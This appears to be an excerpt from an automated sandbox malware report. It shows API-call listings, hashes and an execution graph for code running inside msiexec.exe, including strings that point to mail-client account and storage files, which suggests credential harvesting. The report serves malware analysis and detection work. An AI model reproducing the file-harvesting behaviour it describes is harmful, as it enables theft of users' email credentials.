                                                                                • _free.LIBCMT ref: 02A85B55
                                                                                • SetLastError.KERNEL32(00000000,?,?,02A86C6C), ref: 02A85B62
                                                                                • SetLastError.KERNEL32(00000000,?,?,02A86C6C), ref: 02A85B6E
                                                                                • _abort.LIBCMT ref: 02A85B74
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: 54d10b12247e6fd55802d89f9b2c97fd18e28a245d741ba6780875180ece7995
                                                                                • Instruction ID: 09cb56a202a31d3fa09d34bdfa0acae9a38defcb26bd1a8082e0e9457cc079b0
                                                                                • Opcode Fuzzy Hash: 54d10b12247e6fd55802d89f9b2c97fd18e28a245d741ba6780875180ece7995
                                                                                • Instruction Fuzzy Hash: 52F0D1B2DC4900AAD61233356D8CE5A2BBB9FD1B62BA70424FE15A2180FF21C8034920
                                                                                APIs
                                                                                  • Part of subcall function 02A81E89: lstrlenW.KERNEL32(?,?,?,?,?,02A810DF,?,?,?,00000000), ref: 02A81E9A
                                                                                  • Part of subcall function 02A81E89: lstrcatW.KERNEL32(?,?,?,02A810DF,?,?,?,00000000), ref: 02A81EAC
                                                                                  • Part of subcall function 02A81E89: lstrlenW.KERNEL32(?,?,02A810DF,?,?,?,00000000), ref: 02A81EB3
                                                                                  • Part of subcall function 02A81E89: lstrlenW.KERNEL32(?,?,02A810DF,?,?,?,00000000), ref: 02A81EC8
                                                                                  • Part of subcall function 02A81E89: lstrcatW.KERNEL32(?,02A810DF,?,02A810DF,?,?,?,00000000), ref: 02A81ED3
                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 02A8122A
                                                                                  • Part of subcall function 02A8173A: _strlen.LIBCMT ref: 02A81855
                                                                                  • Part of subcall function 02A8173A: _strlen.LIBCMT ref: 02A81869
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                • API String ID: 4036392271-1520055953
                                                                                • Opcode ID: 79eaeb946ebec73bf45e1ccb49c0247262cdceb99f739e49ef46333170b6a5cf
                                                                                • Instruction ID: c99dc184bd9f276da093849f4e949891b98bc7510c3d8d102267cbcb25d0dde0
                                                                                • Opcode Fuzzy Hash: 79eaeb946ebec73bf45e1ccb49c0247262cdceb99f739e49ef46333170b6a5cf
                                                                                • Instruction Fuzzy Hash: BA2195B9E902086AEB10A7A4EC81FFD737AFF40B14F100556F609EB1D0EAB15D818B59
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02A84AEA,?,?,02A84A8A,?,02A92238,0000000C,02A84BBD,00000000,00000000), ref: 02A84B59
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02A84B6C
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,02A84AEA,?,?,02A84A8A,?,02A92238,0000000C,02A84BBD,00000000,00000000,00000001,02A82082), ref: 02A84B8F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 778835d635d927a225729685128967d44dd6962e8dbab0a428aab9628425d0fd
                                                                                • Instruction ID: 8bb18621e72bf2fa6c75e6985834a668ca86ac5f21a539a3ed323eda5bb88794
                                                                                • Opcode Fuzzy Hash: 778835d635d927a225729685128967d44dd6962e8dbab0a428aab9628425d0fd
                                                                                • Instruction Fuzzy Hash: 33F04435D40608BFDB11BFA0DC4DFADBFB9EF08755F104164E906A6190DF309952CA50
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 02A8715C
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02A8717F
                                                                                  • Part of subcall function 02A856D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02A85702
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02A871A5
                                                                                • _free.LIBCMT ref: 02A871B8
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 02A871C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: 236d24e94e4d45734610a506ceff17d1adbc74652b41fd746684fa302da88972
                                                                                • Instruction ID: a81bb8bb3fb884f8777647c56a171ebbcabafe0c3850110ce32bfa80c4429bdf
                                                                                • Opcode Fuzzy Hash: 236d24e94e4d45734610a506ceff17d1adbc74652b41fd746684fa302da88972
                                                                                • Instruction Fuzzy Hash: EB012476A01610BB63223AB61C88C7BAA3EDAC2BA43240529FC04C3248EF608C0285B1
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000000,02A8636D,02A85713,00000000,?,02A82249,?,?,02A81D66,00000000,?,?,00000000), ref: 02A85B7F
                                                                                • _free.LIBCMT ref: 02A85BB4
                                                                                • _free.LIBCMT ref: 02A85BDB
                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02A85BE8
                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02A85BF1
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: eaae59d016601c847fc8fee9baf2cebc2125736206a1534c94b8aa6a37507dda
                                                                                • Instruction ID: 2359d3c148f1588c47f193461d6ed8f2ba7d99215e1807e073c77e3c348edf57
                                                                                • Opcode Fuzzy Hash: eaae59d016601c847fc8fee9baf2cebc2125736206a1534c94b8aa6a37507dda
                                                                                • Instruction Fuzzy Hash: CB01D1B6DC4A01B6D61236796DCCE2B2B7B9BD17717A30425FE16A2180FF61C8024921
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,02A810DF,?,?,?,00000000), ref: 02A81E9A
                                                                                • lstrcatW.KERNEL32(?,?,?,02A810DF,?,?,?,00000000), ref: 02A81EAC
                                                                                • lstrlenW.KERNEL32(?,?,02A810DF,?,?,?,00000000), ref: 02A81EB3
                                                                                • lstrlenW.KERNEL32(?,?,02A810DF,?,?,?,00000000), ref: 02A81EC8
                                                                                • lstrcatW.KERNEL32(?,02A810DF,?,02A810DF,?,?,?,00000000), ref: 02A81ED3
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcat
                                                                                • String ID:
                                                                                • API String ID: 493641738-0
                                                                                • Opcode ID: 40c0f20132f8c565123c3ee1eb9a617907af101c2ebc67b7a9607f416e1f1308
                                                                                • Instruction ID: 801a1d26433994821f62351bbf4679562c23ac8ead3db57d3f15ed667511a67b
                                                                                • Opcode Fuzzy Hash: 40c0f20132f8c565123c3ee1eb9a617907af101c2ebc67b7a9607f416e1f1308
                                                                                • Instruction Fuzzy Hash: 04F082379406107AD621372AACC5EBF7B7CEFC6B60B140419FA0D871909F949C5396B5
                                                                                APIs
                                                                                • _free.LIBCMT ref: 02A891D0
                                                                                  • Part of subcall function 02A8571E: HeapFree.KERNEL32(00000000,00000000,?,02A8924F,?,00000000,?,00000000,?,02A89276,?,00000007,?,?,02A87E5A,?), ref: 02A85734
                                                                                  • Part of subcall function 02A8571E: GetLastError.KERNEL32(?,?,02A8924F,?,00000000,?,00000000,?,02A89276,?,00000007,?,?,02A87E5A,?,?), ref: 02A85746
                                                                                • _free.LIBCMT ref: 02A891E2
                                                                                • _free.LIBCMT ref: 02A891F4
                                                                                • _free.LIBCMT ref: 02A89206
                                                                                • _free.LIBCMT ref: 02A89218
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: e8b75c11addf06b5bafb6cace5bd8eb5cef6151611d62f23a1d7e22873a4e03f
                                                                                • Instruction ID: 4ea84dd87bf1db44d218da159538941db90121b1299ff6642fe68b7e7beda667
                                                                                • Opcode Fuzzy Hash: e8b75c11addf06b5bafb6cace5bd8eb5cef6151611d62f23a1d7e22873a4e03f
                                                                                • Instruction Fuzzy Hash: 20F01272DD4241E7CA70FB55F6C5C2BBBEAEA007147954C46F889D7600EF31F8908A50
                                                                                APIs
                                                                                • _free.LIBCMT ref: 02A8536F
                                                                                  • Part of subcall function 02A8571E: HeapFree.KERNEL32(00000000,00000000,?,02A8924F,?,00000000,?,00000000,?,02A89276,?,00000007,?,?,02A87E5A,?), ref: 02A85734
                                                                                  • Part of subcall function 02A8571E: GetLastError.KERNEL32(?,?,02A8924F,?,00000000,?,00000000,?,02A89276,?,00000007,?,?,02A87E5A,?,?), ref: 02A85746
                                                                                • _free.LIBCMT ref: 02A85381
                                                                                • _free.LIBCMT ref: 02A85394
                                                                                • _free.LIBCMT ref: 02A853A5
                                                                                • _free.LIBCMT ref: 02A853B6
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 24cb7cd65ff6d21f424e1f443afff616d769e732bfd71f507b30edef36ece7a3
                                                                                • Instruction ID: cdb6432ed9b4be6b930bb7c076acfdf7dc369598d10316e396a29d8fc74cd9c4
                                                                                • Opcode Fuzzy Hash: 24cb7cd65ff6d21f424e1f443afff616d769e732bfd71f507b30edef36ece7a3
                                                                                • Instruction Fuzzy Hash: 4AF03A75CD4120EBCE217F26BA804293BB2F7187203924D8BFC16AB254EF7184238F80
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 02A84C1D
                                                                                • _free.LIBCMT ref: 02A84CE8
                                                                                • _free.LIBCMT ref: 02A84CF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: C:\Windows\System32\msiexec.exe
                                                                                • API String ID: 2506810119-1382325751
                                                                                • Opcode ID: 2a185d2a8d26cd7b598d1709eea4c9cc3fa24e7b18ee7ca57ee8f687c6da8122
                                                                                • Instruction ID: facdb39bed5cb0eef7eab3adf50ff1645564d73e9a6ac4d7e948797a9a396d54
                                                                                • Opcode Fuzzy Hash: 2a185d2a8d26cd7b598d1709eea4c9cc3fa24e7b18ee7ca57ee8f687c6da8122
                                                                                • Instruction Fuzzy Hash: 4B3157B1E44319EFDB21EF9AD9C0A9EBBFDEB89714B104096E90597200DF718A41CF60
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,02A86FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 02A88731
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02A887BA
                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02A887CC
                                                                                • __freea.LIBCMT ref: 02A887D5
                                                                                  • Part of subcall function 02A856D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02A85702
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                • String ID:
                                                                                • API String ID: 2652629310-0
                                                                                • Opcode ID: aa341f47fa12c2b009b3e173c709700b6a46b55c1554927b2dc022122ce10e25
                                                                                • Instruction ID: 502e4fd2006c3b0f2cea1becd5adde43bf7ac35049ce311bf70374ced1c03aa0
                                                                                • Opcode Fuzzy Hash: aa341f47fa12c2b009b3e173c709700b6a46b55c1554927b2dc022122ce10e25
                                                                                • Instruction Fuzzy Hash: 85319A72A0020AEFDF25AF64CC84EAF7BB6EB44714F450128EC04DA194EF39D955CBA0
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(02A8C7DD), ref: 02A8C7E6
                                                                                • GetModuleHandleA.KERNEL32(?,02A8C7DD), ref: 02A8C838
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 02A8C860
                                                                                  • Part of subcall function 02A8C803: GetProcAddress.KERNEL32(00000000,02A8C7F4), ref: 02A8C804
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID:
                                                                                • API String ID: 1646373207-0
                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                • Instruction ID: 1d292e8f63c822c90c1511ddf1b4768c5ceb64735f73138e0160da0b842f9508
                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                • Instruction Fuzzy Hash: 030145109C525038AB2C77740C88EBA5F9B9B23774F141757E000C7193DEA48106CFF6
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,02A81D66,00000000,00000000,?,02A85C88,02A81D66,00000000,00000000,00000000,?,02A85E85,00000006,FlsSetValue), ref: 02A85D13
                                                                                • GetLastError.KERNEL32(?,02A85C88,02A81D66,00000000,00000000,00000000,?,02A85E85,00000006,FlsSetValue,02A8E190,FlsSetValue,00000000,00000364,?,02A85BC8), ref: 02A85D1F
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02A85C88,02A81D66,00000000,00000000,00000000,?,02A85E85,00000006,FlsSetValue,02A8E190,FlsSetValue,00000000), ref: 02A85D2D
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: 8db60b284cfe2585dfd03083c6228f294ede09846de2ca978b4128960be29116
                                                                                • Instruction ID: c2471fb01c13fc2935c3e6d55eab0f9c2d2b30bb8010d0bdcbc054a7a32f8e95
                                                                                • Opcode Fuzzy Hash: 8db60b284cfe2585dfd03083c6228f294ede09846de2ca978b4128960be29116
                                                                                • Instruction Fuzzy Hash: 5501A035E517226BC7219B75EC8CF567768AF057B17510A14FD07DB180EF20D816C6D0
                                                                                APIs
                                                                                • _free.LIBCMT ref: 02A8655C
                                                                                  • Part of subcall function 02A862BC: IsProcessorFeaturePresent.KERNEL32(00000017,02A862AB,00000000,?,?,?,?,00000016,?,?,02A862B8,00000000,00000000,00000000,00000000,00000000), ref: 02A862BE
                                                                                  • Part of subcall function 02A862BC: GetCurrentProcess.KERNEL32(C0000417), ref: 02A862E0
                                                                                  • Part of subcall function 02A862BC: TerminateProcess.KERNEL32(00000000), ref: 02A862E7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                • String ID: *?$.
                                                                                • API String ID: 2667617558-3972193922
                                                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                • Instruction ID: 081a83351a4bc86f33f728adbaed72eeb49f9b00b3a000ed6410846c0841f102
                                                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                • Instruction Fuzzy Hash: DD519375E00209EFEF14EFA8C980AADBBF9EF48714F248169D954E7344EB759A01CB50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _strlen
                                                                                • String ID: : $Se.
                                                                                • API String ID: 4218353326-4089948878
                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                • Instruction ID: b7c7672cc3811e80d7ddf519d842a784d21fee0ba7d5e0ed10f8e36ceda3eb00
                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                • Instruction Fuzzy Hash: C411E7B1900249AEDB10EFA8D840BEDFBFDAF09304F50405AE545E7212EA705A02CB65
                                                                                APIs
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02A82903
                                                                                  • Part of subcall function 02A835D2: RaiseException.KERNEL32(?,?,?,02A82925,00000000,00000000,00000000,?,?,?,?,?,02A82925,?,02A921B8), ref: 02A83632
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02A82920
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                • String ID: Unknown exception
                                                                                • API String ID: 3476068407-410509341
                                                                                • Opcode ID: 48db51c220fc20c5b25fe31bc5525d41df705b32c1785a0e0922876ebffcaf73
                                                                                • Instruction ID: 4f96605d7c72467d0afb3a11b40aafa152d4f3d1043cd902784bbfc726a37888
                                                                                • Opcode Fuzzy Hash: 48db51c220fc20c5b25fe31bc5525d41df705b32c1785a0e0922876ebffcaf73
                                                                                • Instruction Fuzzy Hash: 79F0AF34A4024DB79F14B6A5ED88BBAB7BDAE04B50B504171AD15A2090FF71EA2AC9C1

                                                                                Execution Graph

                                                                                Execution Coverage:5.7%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:1.3%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:73
                                                                                execution_graph 40289 441819 40292 430737 40289->40292 40291 441825 40293 430756 40292->40293 40294 43076d 40292->40294 40295 430774 40293->40295 40296 43075f 40293->40296 40294->40291 40307 43034a memcpy 40295->40307 40306 4169a7 11 API calls 40296->40306 40299 4307ce 40300 430819 memset 40299->40300 40308 415b2c 11 API calls 40299->40308 40300->40294 40301 43077e 40301->40294 40301->40299 40304 4307fa 40301->40304 40303 4307e9 40303->40294 40303->40300 40309 4169a7 11 API calls 40304->40309 40306->40294 40307->40301 40308->40303 40309->40294 37678 442ec6 19 API calls 37852 4152c6 malloc 37853 4152e2 37852->37853 37854 4152ef 37852->37854 37856 416760 11 API calls 37854->37856 37856->37853 37857 4466f4 37876 446904 37857->37876 37859 446700 GetModuleHandleA 37862 446710 __set_app_type __p__fmode __p__commode 37859->37862 37861 4467a4 37863 4467ac __setusermatherr 37861->37863 37864 4467b8 37861->37864 37862->37861 37863->37864 37877 4468f0 _controlfp 37864->37877 37866 4467bd _initterm __wgetmainargs _initterm 37867 44681e GetStartupInfoW 37866->37867 37868 446810 37866->37868 37870 446866 GetModuleHandleA 37867->37870 37878 41276d 37870->37878 37874 446896 exit 37875 44689d _cexit 37874->37875 37875->37868 37876->37859 37877->37866 37879 41277d 37878->37879 37921 4044a4 LoadLibraryW 37879->37921 37881 412785 37913 412789 37881->37913 37929 414b81 37881->37929 37884 4127c8 37935 412465 memset ??2@YAPAXI 37884->37935 37886 4127ea 37947 40ac21 37886->37947 37891 412813 37965 40dd07 memset 37891->37965 37892 412827 37970 40db69 memset 37892->37970 37896 412822 37992 4125b6 ??3@YAXPAX DeleteObject 37896->37992 37897 40ada2 _wcsicmp 37898 41283d 37897->37898 37898->37896 37901 412863 CoInitialize 37898->37901 37975 41268e 37898->37975 37900 412966 37993 40b1ab free free 37900->37993 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37901->37991 37905 41296f 37994 40b633 37905->37994 37907 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37912 412957 CoUninitialize 37907->37912 37918 4128ca 37907->37918 37912->37896 37913->37874 37913->37875 37914 4128d0 TranslateAcceleratorW 37915 412941 GetMessageW 37914->37915 37914->37918 37915->37912 37915->37914 37916 412909 IsDialogMessageW 37916->37915 37916->37918 37917 4128fd IsDialogMessageW 37917->37915 37917->37916 37918->37914 37918->37916 37918->37917 37919 41292b TranslateMessage DispatchMessageW 37918->37919 37920 41291f IsDialogMessageW 37918->37920 37919->37915 37920->37915 37920->37919 37922 4044cf GetProcAddress 37921->37922 37925 4044f7 37921->37925 37923 4044e8 FreeLibrary 37922->37923 37926 4044df 37922->37926 37924 4044f3 37923->37924 37923->37925 37924->37925 37927 404507 MessageBoxW 37925->37927 37928 40451e 37925->37928 37926->37923 37927->37881 37928->37881 37930 414b8a 37929->37930 37931 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37929->37931 37998 40a804 memset 37930->37998 37931->37884 37934 414b9e GetProcAddress 37934->37931 37937 4124e0 37935->37937 37936 412505 ??2@YAPAXI 37938 41251c 37936->37938 37941 412521 37936->37941 37937->37936 38020 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37938->38020 38009 444722 37941->38009 37946 41259b wcscpy 37946->37886 38025 40b1ab free free 37947->38025 37949 40ad76 38026 40aa04 37949->38026 37952 40a9ce malloc memcpy free free 37955 40ac5c 37952->37955 37953 40ad4b 37953->37949 38049 40a9ce 37953->38049 37955->37949 37955->37952 37955->37953 37956 40ace7 free 37955->37956 38029 40a8d0 37955->38029 38041 4099f4 37955->38041 37956->37955 37960 40a8d0 7 API calls 37960->37949 37961 40ada2 37962 40adc9 37961->37962 37964 40adaa 37961->37964 37962->37891 37962->37892 37963 40adb3 _wcsicmp 37963->37962 37963->37964 37964->37962 37964->37963 38054 40dce0 37965->38054 37967 40dd3a GetModuleHandleW 38059 40dba7 37967->38059 37971 40dce0 3 API calls 37970->37971 37972 40db99 37971->37972 38131 40dae1 37972->38131 38145 402f3a 37975->38145 37977 412766 37977->37896 37977->37901 37978 4126d3 _wcsicmp 37979 4126a8 37978->37979 37979->37977 37979->37978 37981 41270a 37979->37981 38179 4125f8 7 API calls 37979->38179 37981->37977 38148 411ac5 37981->38148 37991->37907 37992->37900 37993->37905 37995 40b640 37994->37995 37996 40b639 free 37994->37996 37997 40b1ab free free 37995->37997 37996->37995 37997->37913 37999 40a83b GetSystemDirectoryW 37998->37999 38000 40a84c wcscpy 37998->38000 37999->38000 38005 409719 wcslen 38000->38005 38003 40a881 LoadLibraryW 38004 40a886 38003->38004 38004->37931 38004->37934 38006 409724 38005->38006 38007 409739 wcscat LoadLibraryW 38005->38007 38006->38007 38008 40972c wcscat 38006->38008 38007->38003 38007->38004 38008->38007 38010 444732 38009->38010 38011 444728 DeleteObject 38009->38011 38021 409cc3 38010->38021 38011->38010 38013 412551 38014 4010f9 